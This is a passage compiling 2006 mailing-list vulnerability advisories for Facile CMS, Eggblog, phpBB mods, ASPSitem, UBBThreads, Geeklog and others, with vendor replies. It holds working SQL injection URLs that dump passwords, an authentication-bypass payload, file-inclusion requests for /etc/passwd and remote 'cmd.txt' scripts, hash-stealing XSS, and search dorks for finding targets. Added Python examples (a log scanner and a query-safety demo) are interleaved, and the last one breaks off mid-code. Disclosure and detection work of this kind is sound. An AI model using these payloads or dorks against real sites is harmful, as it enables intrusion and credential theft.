EXAMPLE - http://[site]/enigmadir/arsiv.asp?d=hid&e=desc+UNION+SELECT+0,sifre,isim,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+yonet+where+yonetid%20like%201144927664&ay=00&yil=00&e_kad=00
GET - http://[site]/enigmadir/haber_devam.asp?id=SQL
The examples below need admin rights.
GET - http://[site]/enigmadir/admin/y_admin.asp?yid=SQL
EXAMPLE - http://[site]/enigmadir/admin/y_admin.asp?yid=34+UNION+SELECT+0,1,mail,3,4,5,sifre,isim,8,9,sehir+from+yonet+where+yonetid=1144927664
GET - http://[site]/enigmadir/admin/reklam_detay.asp?bid=SQL
GET - http://[site]/enigmadir/admin/detay_yorum.asp?hid=SQL
GET - http://[site]/enigmadir/admin/haber_sil.asp?hid=SQL
GET - http://[site]/enigmadir/admin/kategori_d.asp?o=1&kid=SQL
GET - http://[site]/enigmadir/admin/haber_ekle.asp?tur=SQL
GET - http://[site]/enigmadir/admin/e_mesaj_yaz.asp?s=SQL
GET - http://[site]/enigmadir/admin/admin_sil.asp?id=SQL
--
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=34
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=34
Advisory: [EMAIL PROTECTED] Interactive Web <= 0.8x Multiple Remote Vulnerabilities.
--Security Report--
Advisory: [EMAIL PROTECTED] Interactive Web <= 0.8x Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 27/05/06 05:57 PM
---
Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: Facile (http://www.facile-web.it/)
Version: 0.8.5 and prior versions must be affected.
About: Via these methods a remote attacker can include arbitrary files into Facile CMS. Parameter l in p-popupgallery.php is not sanitized before being used. You can find the vulnerable code in p-popupgallery.php at line 28

-Source in p-popupgallery.php-
28: include ("$l/p-lang-base.php");
-End of source-

This lets a remote attacker include internal and external files through p-popupgallery.php. If magic_quotes_gpc is off a remote attacker can include internal files. If allow_url_fopen is on a remote attacker can include external files. This works regardless of the register_globals value. That vulnerability is in 0.8.41 - 0.8.5. All other vulnerabilities work on version 0.8x.

There are further file inclusion vulnerabilities in p-editpage.php and p-editbox.php. The parameter pathfile is not sanitized properly. A remote attacker can include arbitrary local files through these scripts. In php5 a remote attacker can also include external resources. This works with register_globals on. The vulnerable code in both files can be found at lines 20-21.

-Sources in both-
20: if(isset($pathfile) && is_file($pathfile)){
21:     include($pathfile);
-End of source-

There are further file inclusion vulnerabilities in the themes. All themes are vulnerable to inclusion of arbitrary local files. This can also lead to XSS. Parameters mytheme and myskin are not sanitized properly before being used. LFI works with magic_quotes_gpc off.

Vulnerable files are:
p-themes/lowgraphic/index.inc.php
p-themes/classic/index.inc.php
p-themes/puzzle/index.inc.php
p-themes/simple/index.inc.php
p-themes/ciao/index.inc.php

A remote attacker can also disclose local resources. The parameter lang in index.php is not sanitized properly before being used. This works with magic_quotes_gpc off.
Level: Highly Critical
---
How&Example:
GET - http://[victim]/[FacilePath]/p-popupgallery.php?l=[FILE]
EXAMPLE - http://[victim]/[FacilePath]/p-popupgallery.php?l=http://yourhost.com/cmd.txt?
EXAMPLE - http://[victim]/[FacilePath]/p-popupgallery.php?l=/etc/passwd%00
GET - http://[victim]/[FacilePath]/p-editbox.php?pathfile=[FILE]
EXAMPLE - http://[victim]/[FacilePath]/p-editbox.php?pathfile=/etc/passwd
EXAMPLE - http://[victim]/[FacilePath]/p-editbox.php?pathfile=\\192.168.1.1\file.php - php5
GET - http://[victim]/[FacilePath]/p-editpage.php?pathfile=[FILE]
EXAMPLE - http://[victim]/[FacilePath]/p-editpage.php?pathfile=/etc/passwd
EXAMPLE - http://[victim]/[FacilePath]/p-editpage.php?pathfile=\\192.168.1.1\file.php - php5
GET - http://[victim]/[FacilePath]/p-themes/THEME/index.inc.php?mytheme=[FILE]
EXAMPLE - http://[victim]/[FacilePath]/p-themes/THEME/index.inc.php?mytheme=/etc/passwd%00
GET - http://[victim]/[FacilePath]/p-themes/THEME/index.inc.php?mytheme=[XSS]&myskin=[XSS]
GET - http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=[FILE]
EXAMPLE - http://[victim]/[FacilePath]/index.php?mn=0&pg=0&lang=/etc/passwd%00
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=35
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=35
---
Dorks: Powered by [EMAIL PROTECTED] Interactive Web
Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities
--Security Report--
Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 27/05/06 06:15 PM
---
Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: Eggblog (http://www.eggblog.net/)
Version: 3.0.6 and prior versions must be affected.
About: Via this method a remote attacker can inject arbitrary SQL queries into Eggblog. This SQL injection works with Eggblog version 3.0.6 and below. The problem is that the id parameter in rss/posts.php is not sanitized properly before being used in the SQL query. This lets a remote attacker inject arbitrary SQL queries and execute them. This SQL injection needs magic_quotes_gpc off.

There is another problem in Eggblog 2.x. In registration, the member's register status is not sanitized properly. This lets a remote attacker register a new member with an admin nick and get administration privileges on Eggblog.
Level: Critical
---
How&Example:
GET - http://[site]/[EggBlog]/rss/posts.php?id=SQL
EXAMPLE - http://[site]/[EggBlog]/rss/posts.php?id=1'/**/UNION/**/SELECT/**/0,concat('Username:%20',username),concat('Password:%20',password)/**/from/**/eggblog_members/*
POST/EXAMPLE - http://[site]/[EggBlog]/home/register.php?username=victim&password=password&[EMAIL PROTECTED]&ref=
--
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=36
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=36
Advisory: phpBB 2.x (admin/admin_hacks_list.php) Local Inclusion Vulnerability.
--Security Report--
Advisory: phpBB 2.x (admin/admin_hacks_list.php) Local Inclusion Vulnerability.
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 27/05/06 07:37 PM
---
Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: Nivisec (http://www.nivisec.com/)
Version: 2.x and prior versions must be affected.
About: Via these methods a remote attacker can include arbitrary local files into phpBB. The board_config[default_lang] and phpEx variables in admin/admin_hacks_list.php are not sanitized properly before being used. You can find the vulnerable code in admin_hacks_list.php at lines 30-37

-Source in admin_hacks_list.php-
30: if( !empty($setmodules) )
31: {
32:     include($phpbb_root_path . 'language/lang_' . $board_config['default_lang'] . '/lang_admin_hacks_list.' . $phpEx);
33:     $filename = basename(__FILE__);
34:     $module['General']['Hacks_List'] = $filename;
35:
36:     return;
37: }
-End of source-

Level: Highly Critical
---
How&Example:
Successful exploitation needs register_globals on
GET - http://[victim]/[phpBB]/admin/admin_hacks_list.php?setmodules=1&board_config[default_lang]=english&phpEx=[FILE]
EXAMPLE - http://[victim]/[phpBB]/admin/admin_hacks_list.php?setmodules=1&board_config[default_lang]=english&phpEx=../../../../../../../../etc/passwd
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=37
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=37
---
Dorks: Powered by phpBB inurl:hacks_list.php
Advisory: phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability.
--Security Report--
Advisory: phpBB 2.x (Activity MOD Plus) File Inclusion Vulnerability.
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 27/05/06 07:49 PM
---
Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: phpBB-Amod (http://www.phpbb-amod.com/)
Version: 2.x and prior versions must be affected.
About: Via these methods a remote attacker can include arbitrary local files into phpBB. The phpbb_root_path variable in /language/lang_english/lang_activity.php is not sanitized before being used. You can find the vulnerable code in admin_hacks_list.php at line 12

-Source in lang_activity.php-
12: include_once($phpbb_root_path .'language/lang_'. $board_config['default_lang'] .'/lang_activity_char.'. $phpEx);
-End of source-

If magic_quotes_gpc is off a remote attacker can include arbitrary internal files by null char (0x00) termination. If allow_url_fopen is on a remote attacker can include arbitrary external files through lang_activity.php. Both require register_globals on.
Level: Highly Critical
---
How&Example:
Successful exploitation needs register_globals on
GET - http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=[FILE]
EXAMPLE - http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=/etc/passwd%00
Requires magic_quotes_gpc off
EXAMPLE - http://[victim]/[phpBB]/language/lang_english/lang_activity.php?phpbb_root_path=http://yoursite.com/script.txt
Requires allow_url_fopen on
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=38
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=38
---
Dorks: Powered by phpBB inurl:activity.php
Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.
--Security Report--
Advisory: ASPSitem <= 2.0 Multiple Vulnerabilities.
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 27/05/06 08:26 PM
---
Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: ASPSitem (http://www.aspsitem.com)
Version: 2.0 and prior versions must be affected.
About: Via this method a remote attacker can inject arbitrary SQL queries into the bid parameter in Anket.asp. A remote attacker can also read other users' private messages. The parameter id in Hesabim.asp is not checked properly for the owner status of the private message.
Level: Critical
---
How&Example:
SQL injection -
GET - http://[victim]/[ASPSitemDir]/Anket.asp?hid=[SQL]
EXAMPLE - http://[victim]/[ASPSitemDir]/Anket.asp?hid=4%20union%20select%20sifre,0%20from%20uyeler%20where%20id%20like%201
With this example a remote attacker can leak userid 1's login information from the database.
Read others' private messages -
GET/EXAMPLE - http://[victim]/[ASPSitemDir]/Hesabim.asp?mesaj=oku&id=1&uye=yourusername
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
* 27/05/2006: Vendor already released a patch for the SQL injection; you can find it here: http://www.aspsitem.com/Forum.asp?forum=oku&msgid=44710
--
Exploit: http://www.nukedx.com/?getxpl=39
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=39
---
Dorks: Teşekkür ASPSitem
Advisory: UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities.
--Security Report--
Advisory: UBBThreads 5.x,6.x Multiple File Inclusion Vulnerabilities.
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 27/05/06 09:44 PM
---
Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: Infopop (http://www.infopop.com/)
Version: 5.x and 6.x; prior versions must also be affected.
About: Via these methods a remote attacker can include arbitrary files into UBBThreads. The thispath and configdir variables in ubbt.inc.php are not sanitized before being used. You can find the vulnerable code in ubbt.inc.php at lines 23-42

-Source in ubbt.inc.php-
23: if (!$configdir) {
24:     $configdir = $thispath;
25: }
26:
27: // --
28: // In case register globals are on we need to protect a few variables
29: if (
30:     isset($HTTP_GET_VARS['thispath'])
31:     || isset($HTTP_POST_VARS['thispath'])
32:     || isset($HTTP_COOKIE_VARS['thispath'])
33:     || isset($HTTP_POST_FILES['thispath'])
34:     || isset($HTTP_GET_VARS['configdir'])
35:     || isset($HTTP_POST_VARS['configdir'])
36:     || isset($HTTP_COOKIE_VARS['configdir'])
37:     || isset($HTTP_POST_FILES['configdir']) )
38: {
39:     exit;
40: }
41:
42: include("$configdir/config.inc.php");
-End of source-

So if register_globals is on, a remote attacker can inject an arbitrary variable via GLOBALS[thispath]. Also, if php < 4.1.0 there are no $HTTP_* arrays, so a remote attacker can use thispath in the QueryString. This works on version 6.x. For version 5.x there is no variable check in ubbt.inc.php, so a remote attacker can inject thispath via the QueryString and include external and internal files. Including internal files requires magic_quotes_gpc off.

There is another inclusion vulnerability in includepollresults.php for version 6.x. Parameters config[cookieprefix] and w3t_language are not sanitized properly before being used, so they let a remote attacker include arbitrary internal files. You can find the vulnerable code in includepollresults.php at line 24

-Source code in includepollresults.php-
24: require ("languages/${$config['cookieprefix']."w3t_language"}/includepollresults.php");
-End of source-

There is also an XSS vulnerability in all pages. If the debug parameter is sent in the QueryString it lets a remote attacker make malicious links for clicking and execute arbitrary HTML/JS/VBS etc. code in the victim's browser.
Level: Highly Critical
---
How&Example:
Successful exploitation needs register_globals on
Version 6.x
GET - http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=[FILE]
EXAMPLE - http://[site]/[ubbpath]/includepollresults.php?config[cookieprefix]=&w3t_language=../../../../../etc/passwd%00
GET - http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=[FILE]
EXAMPLE - http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=http://yoursite.com/cmd.txt?
EXAMPLE - http://[site]/[ubbpath]/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00
If php version < 4.1.0 or UBB version <= 5.x
GET - http://[site]/[ubbpath]/ubbt.inc.php?thispath=[FILE]
EXAMPLE - http://[site]/[ubbpath]/ubbt.inc.php?thispath=http://yoursite.com/cmd.txt?
EXAMPLE - http://[site]/[ubbpath]/ubbt.inc.php?thispath=/etc/passwd%00
XSS:
GET - http://[site]/[ubbpath]/index.php?debug=[XSS]
EXAMPLE - http://[site]/[ubbpath]/index.php?debug=<script>alert();</script>
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=40
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=40
---
Dorks: UBB.threads™
Advisory: Blend Portal <= 1.2.0 for phpBB 2.x (blend_data/blend_common.php) File Inclusion Vulnerability
--Security Report--
Advisory: Blend Portal <= 1.2.0 for phpBB 2.x (blend_data/blend_common.php) File Inclusion Vulnerability.
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 28/05/06 07:52 PM
---
Contacts:{ ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: phpbb-portal (http://www.phpbb-portal.com/)
Version: 1.2.0 and prior versions must be affected.
About: Via these methods a remote attacker can include arbitrary internal/external files into phpBB. The phpbb_root_path variable in /blend_data/blend_common.php is not sanitized properly before being used. You can find the vulnerable code in blend_common.php at lines 74-77

-Source in blend_common.php-
74: else
75: {
76:     include_once($phpbb_root_path . BLEND_DATA_PATH . BLEND_CACHE_PATH .'config.'. $phpEx);
77: }
-End of source-

Level: Highly Critical
---
How&Example:
Successful exploitation needs register_globals on and allow_url_fopen on
GET - http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=[FILE]
EXAMPLE - http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=http://yoursite.com/cmd.txt?
EXAMPLE - http://[victim]/[phpBB]/blend_data/blend_common.php?phpbb_root_path=/etc/passwd%00
---
Timeline:
* 28/05/2006: Vulnerability found.
* 28/05/2006: Contacted with vendor and waiting reply.
---
Exploit: http://www.nukedx.com/?getxpl=41
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=41
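The nukedx file-inclusion advisories above all rely on a few request shapes: a URL in an include-path parameter, a %00-terminated path, ../ traversal, and GLOBALS[] or board_config[] style names that abuse register_globals. The following Python is an added example, not part of any advisory: it scans constructed access-log lines (modelled on the example requests) for those shapes; because the rules match how a value is shaped rather than a fixed parameter list, they also flag parameter names the advisories never mention.

```python
"""Flag register_globals / file-inclusion request shapes in web access logs.

Added example, not from any advisory.  The log lines are constructed; the
parameter names (phpbb_root_path, GLOBALS[thispath], board_config[...], phpEx)
come from the advisories, but the rules key on value shape, not on names.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# Combined log format: client, request line, status.  Constructed shape.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Value prefixes that turn an include() into a remote fetch (or a UNC read).
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "\\\\")

# Array-style names that let register_globals overwrite a script's own arrays.
POISON_NAMES = re.compile(r'^(GLOBALS|_GET|_POST|_COOKIE|_SERVER|board_config|config)\[', re.I)


def classify_param(name, value):
    """Return the indicators a single decoded query parameter trips."""
    hits = []
    if value.lower().startswith(REMOTE_PREFIXES):
        hits.append("remote-include-url")          # ?phpbb_root_path=http://.../cmd.txt?
    if "\x00" in value:
        hits.append("null-byte-truncation")        # ?tinybb_footers=/etc/passwd%00
    if "../" in value or "..\\" in value:
        hits.append("path-traversal")              # ?phpEx=../../../../etc/passwd
    if POISON_NAMES.match(name):
        hits.append("register-globals-poisoning")  # ?GLOBALS[thispath]=...
    return hits


def scan_request(uri):
    """Map each offending parameter name to its indicators for one request URI."""
    findings = {}
    query = urlsplit(uri).query
    # keep_blank_values: ?config[cookieprefix]=&w3t_language=... has an empty value
    for name, value in parse_qsl(query, keep_blank_values=True):
        hits = classify_param(name, value)
        if hits:
            findings.setdefault(name, []).extend(hits)
    return findings


def scan_log(lines):
    """Return (client ip, uri, findings) for every request that trips a rule."""
    out = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        findings = scan_request(m.group("uri"))
        if findings:
            out.append((m.group("ip"), m.group("uri"), findings))
    return out


# Constructed log entries, modelled on the advisories' example requests.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/May/2006:20:46:39 +0300] "GET /forum/blend_data/blend_common.php?phpbb_root_path=http://203.0.113.9/cmd.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [28/May/2006:20:47:02 +0300] "GET /forum/ubbt.inc.php?GLOBALS[thispath]=/etc/passwd%00 HTTP/1.1" 200 1843',
    '203.0.113.5 - - [28/May/2006:20:47:30 +0300] "GET /forum/admin/admin_hacks_list.php?setmodules=1&board_config[default_lang]=english&phpEx=../../../../etc/passwd HTTP/1.1" 200 1843',
    '198.51.100.7 - - [28/May/2006:20:48:01 +0300] "GET /forum/index.php?mn=0&pg=0&lang=en HTTP/1.1" 200 9120',
]

if __name__ == "__main__":
    for ip, uri, findings in scan_log(SAMPLE_LOG):
        print(ip, uri, findings)
```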
VARIOMAT(advanced cms tool)SQL injection/XSS
===
Discovery By: CrAzY CrAcKeR
Site: www.alshmokh.com
nono225 - mHOn - rageh - LoverHacker - Brh - LiNuX_rOOt - BoNy_m - rootshill
===
Example:-
/news.php?mode=single&view=act&item=76&subcat=[SQL]
/news.php?mode=single&view=act&item=76&subcat=[XSS]
===
Email: [EMAIL PROTECTED]
Xss exploit in Photoalbum BW v1.3
Xss exploit in Photoalbum BW v1.3

forum type : Photoalbum BW v1.3
bug found by : black-code sweet-devil
team : site-down
type : Xss

exploit :
http://www.example.com/superalbum/index.php?pic='<script>alert(10)</script>

path to admin login: ###

emails: [EMAIL PROTECTED] [EMAIL PROTECTED]

### All my respect to our friends , lezr.com , g123g.net

done .. peace
[KAPDA::#45] - geeklog multiple vulnerabilities
KAPDA New advisory

Vendor: http://www.geeklog.net
Bugs: Path Disclosure, XSS, SQL Injection (Authentication bypass)
Vulnerable Version: geeklog-1.4.0sr2 (prior versions also may be affected)
Exploitation: Remote with browser

Description:
geeklog is a freely available PHP-based web content management system that uses a MySQL database.

Vulnerabilities:

--Path Disclosure--
Reason: direct access to special files that generate a PHP error containing installation path information. Several files are vulnerable in this case.
Example:
http://example.com/geeklog/layout/professional/functions.php
http://example.com/geeklog/getimage.php?mode=show&image=dd

--XSS--
Reason: the script doesn't properly validate user supplied input in getimage.php, which results in an XSS vulnerability.
Example:
http://example.com/geeklog/getimage.php?mode=show&image=./<IMG%20SRC=JaVaScRiPt:alert(document.cookie)>

Code Snippets: /getimage.php line#100-103
$display = COM_errorLog('File, ' . $downloader->getPath() . $image . ', was not found in getimage.php');
if ($mode == 'show') {
    echo COM_siteHeader ('menu') . $display . COM_siteFooter ();

--SQL Injection (Authentication bypass)--
Reason: again the script doesn't properly validate user supplied input in /admin/auth.inc.php, which may result in authentication bypass using SQL injection to gain admin privileges.

Code Snippets: /admin/auth.inc.php line#44-45
if (!empty ($_POST['loginname']) && !empty ($_POST['passwd'])) {
    $status = SEC_authenticate ($_POST['loginname'], $_POST['passwd'], $uid);

../system/lib-security.php line#697-732
function SEC_authenticate($username, $password, &$uid)
{
    global $_TABLES, $LANG01, $_CONF;

    $result = DB_query("SELECT status, passwd, email, uid FROM {$_TABLES['users']} WHERE username='$username' AND ((remoteservice is null) or (remoteservice = ''))");
    $tmp = mysql_errno();
    $nrows = DB_numRows( $result );

    if(( $tmp == 0 ) && ( $nrows == 1 )) {
        $U = DB_fetchArray( $result );
        $uid = $U['uid'];
        if ($U['status'] == USER_ACCOUNT_DISABLED) {
            return USER_ACCOUNT_DISABLED; // banned, jump to here to save an md5 calc.
        } elseif ($U['passwd'] != md5( $password )) {
            return -1; // failed login
        } elseif ($U['status'] == USER_ACCOUNT_AWAITING_APPROVAL) {
            //awaiting approval, jump to msg.
            echo COM_refresh($_CONF['site_url'] . '/users.php?msg=70');
            exit;
        } elseif ($U['status'] == USER_ACCOUNT_AWAITING_ACTIVATION) {
            // Awaiting user activation, activate:
            DB_change($_TABLES['users'],'status',USER_ACCOUNT_ACTIVE,'username',$username);
            return USER_ACCOUNT_ACTIVE;
        } else {
            return $U['status']; // just return their status
        }
    } else {
        $tmp = $LANG01[32] . ": '" . $username . "'";
        COM_errorLog( $tmp, 1 );
        return -1;
    }
}

As you see there is no input validation here, so when magic_quotes_gpc=off you can bypass login authentication.
Example:
/admin/moderation.php
POST data:
loginname: me' union select 3,'3d2172418ce305c7d16d4b05597c6a59','email',2 from gl_users where username='Admin
passwd: 2

Solution:
Version geeklog-1.4.0sr3 is available now.
http://www.geeklog.net/article.php/geeklog-1.4.0sr3

Original Advisory: http://kapda.ir/advisory-336.html

Credit:
Discovered & released by trueend5 (trueend5 kapda ir)
Security Science Researchers Institute Of Iran [http://www.KAPDA.ir]
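A small sqlite3 model of the lookup quoted above, added here as an example (not Geeklog's code): the string-built query beside its parameterized form, run against a constructed gl_users table with a payload shaped like the advisory's POST data. The table contents, passwords and the hash in the payload are constructed for this example; the control flow (exactly one row, then hash comparison) follows the quoted SEC_authenticate().

```python
"""Geeklog-style login lookup: string-built query beside the parameterized form.

Added example, not Geeklog's code.  Shows why a UNION row carrying a hash the
attacker knows turns the "exactly one row, then compare md5" check into a
bypass when the username is spliced into the SQL, and why binding it does not.
"""
import hashlib
import hmac
import sqlite3

# Same columns the quoted Geeklog query reads; all data is constructed.
SCHEMA = """
CREATE TABLE gl_users (
    uid INTEGER, username TEXT, passwd TEXT, email TEXT,
    status INTEGER, remoteservice TEXT
);
"""
ADMIN_PW = "constructed-admin-secret"
ROWS = [(2, "Admin", hashlib.md5(ADMIN_PW.encode()).hexdigest(),
         "admin@example.invalid", 3, None)]

# Same shape as the advisory's POST payload: the injected UNION row carries a
# hash the attacker knows, so the single returned row is checked against *their*
# password, while the uid column is whatever they wrote (here the admin's 2).
ATTACKER_PW = "2"
PAYLOAD = ("me' union select 3,'%s','email',2 from gl_users where username='Admin"
           % hashlib.md5(ATTACKER_PW.encode()).hexdigest())

WHERE_TAIL = " AND ((remoteservice is null) or (remoteservice = ''))"


def new_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.executemany("INSERT INTO gl_users VALUES (?,?,?,?,?,?)", ROWS)
    return con


def lookup_vulnerable(con, username):
    # Mirrors DB_query() in lib-security.php: the raw username is spliced in.
    sql = ("SELECT status, passwd, email, uid FROM gl_users WHERE username='"
           + username + "'" + WHERE_TAIL)
    return con.execute(sql).fetchall()


def lookup_safe(con, username):
    # Bound parameter: the value can never change the statement's structure,
    # so a quote or UNION in it is just part of the name being looked up.
    sql = "SELECT status, passwd, email, uid FROM gl_users WHERE username=?" + WHERE_TAIL
    return con.execute(sql, (username,)).fetchall()


def authenticate(lookup, username, password):
    """Follow the quoted control flow: exactly one row, then compare hashes.
    Returns the row's uid on success, -1 on failure."""
    rows = lookup(new_db(), username)
    if len(rows) != 1:
        return -1
    status, passwd, email, uid = rows[0]
    # Unsalted md5 is kept only to mirror the page; compare in constant time.
    if not hmac.compare_digest(passwd, hashlib.md5(password.encode()).hexdigest()):
        return -1
    return uid


if __name__ == "__main__":
    print("vulnerable:", authenticate(lookup_vulnerable, PAYLOAD, ATTACKER_PW))
    print("parameterized:", authenticate(lookup_safe, PAYLOAD, ATTACKER_PW))
```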
UBBThreads 5.x,6.x md5 hash disclosure
UBBThreads 5.x,6.x md5 hash disclosure
---
Using XSS such as the one reported earlier:

http://[site]/[ubbpath]/index.php?debug=[xss]

will allow you to inject javascript and steal MD5 Hashes from:

http://[site]/[ubbpath]/editbasic.php

The MD5 is automatically included in the source of the html for a logged on user; the field type is password so it appears as ******, although the source contains the MD5. Below is an example snippet of the html source:

<input type="password" name="ChosenPassword" value="81dc9bdb52d04dc20036dbd8313ed055" class="formboxes" />
<br />
<br />
Verify Password
<br />
<input type="password" name="Verify" value="81dc9bdb52d04dc20036dbd8313ed055" class="formboxes" />

A malicious attacker could force a user to perform a GET request to the xss containing js to steal their hash. The below javascript would grab the MD5 using the XMLHttpRequest object. str is defined as the ResponseText from XMLHttpRequest()

function findmd5(str){
    var s = str.indexOf('name="ChosenPassword" value="');
    var e = str.indexOf('" class="f', s);
    return str.substring(s+29, e);
}

-
Discovered By: splices
www.securident.com
RE: Advisory: Blend Portal <= 1.2.0 for phpBB 2.x (blend_data/blend_common.php) File Inclusion Vulnerability
I have addressed this issue and the one reported about the Activity Mod Plus. Below is a link to patches for both. Thanks.

http://phpbb-tweaks.com/topics.html-p-17623#17623

Thanks For Your E-Mail
aUsTiN Staff
For an interactive phpBB Support board http://phpbb-tweaks.com/
For a phpBB based portal support http://phpbb-portal.com/
For a phpBB based gaming system support http://phpbb-amod.com/
http://aUsTiN-Inc.net/

From: Mustafa Can Bjorn IPEKCI [EMAIL PROTECTED]
To: [EMAIL PROTECTED], full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com, [EMAIL PROTECTED]
Subject: Advisory: Blend Portal <= 1.2.0 for phpBB 2.x (blend_data/blend_common.php) File Inclusion Vulnerability
Date: Sun, 28 May 2006 20:46:39 +0300
RE: Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities
These issues have been fixed as of v3.07. v2 is not supported and should no longer be available to download. Please let me know if this is not the case.
Thanks,
Egg
www.eggblog.net

-Original Message-
From: Mustafa Can Bjorn IPEKCI [mailto:[EMAIL PROTECTED]]
Sent: 28 May 2006 15:01
To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk; bugtraq@securityfocus.com; [EMAIL PROTECTED]
Subject: Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities

--Security Report--
Advisory: Eggblog <= 3.x Multiple Remote Vulnerabilities
---
Author: Mustafa Can Bjorn nukedx a.k.a nuker IPEKCI
---
Date: 27/05/06 06:15 PM
---
Contacts: { ICQ: 10072 MSN/Email: [EMAIL PROTECTED] Web: http://www.nukedx.com }
---
Vendor: Eggblog (http://www.eggblog.net/)
Version: 3.0.6 and prior versions must be affected.
About: Via this method a remote attacker can inject arbitrary SQL queries into Eggblog. This SQL injection works with Eggblog version 3.0.6 and below. The problem is that the id parameter in rss/posts.php is not sanitized properly before it is used in an SQL query. This allows a remote attacker to inject arbitrary SQL queries and execute them. This SQL injection needs magic_quotes_gpc off.
There is another problem in Eggblog 2.x. In registration, the member register status is not sanitized properly. This allows a remote attacker to register a new member as an admin nick and get administration privileges on Eggblog.
Level: Critical
---
How/Example:
GET - http://[site]/[EggBlog]/rss/posts.php?id=SQL
EXAMPLE - http://[site]/[EggBlog]/rss/posts.php?id=1'/**/UNION/**/SELECT/**/0,concat('Username:%20',username),concat('Password:%20',password)/**/from/**/eggblog_members/*
POST/EXAMPLE - http://[site]/[EggBlog]/home/register.php?username=victim&password=password;&[EMAIL PROTECTED]&ref=
--
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted vendor and waiting for reply.
---
Exploit: http://www.nukedx.com/?getxpl=36
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=36
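The rss/posts.php injection, as an added example that is not Eggblog's code: a query built by string concatenation next to its parameterised form, run against an in-memory SQLite stand-in for the Eggblog tables. The schema, the eggblog_posts table and its columns are constructed here (assumptions); only eggblog_members/username/password come from the advisory. The advisory's payload uses MySQL's concat() and a trailing /* to swallow the closing quote; the SQLite rendering below uses || and closes the quote itself.

```python
import sqlite3

# Constructed stand-in schema (assumption: the real Eggblog schema differs).
SCHEMA = """
CREATE TABLE eggblog_posts (id INTEGER, title TEXT, body TEXT);
CREATE TABLE eggblog_members (id INTEGER, username TEXT, password TEXT);
INSERT INTO eggblog_posts VALUES (1, 'hello world', 'first post');
INSERT INTO eggblog_members VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
"""

# SQLite rendering of the advisory's UNION payload: || instead of concat(),
# and a closing '1'='1 instead of the trailing /* comment.
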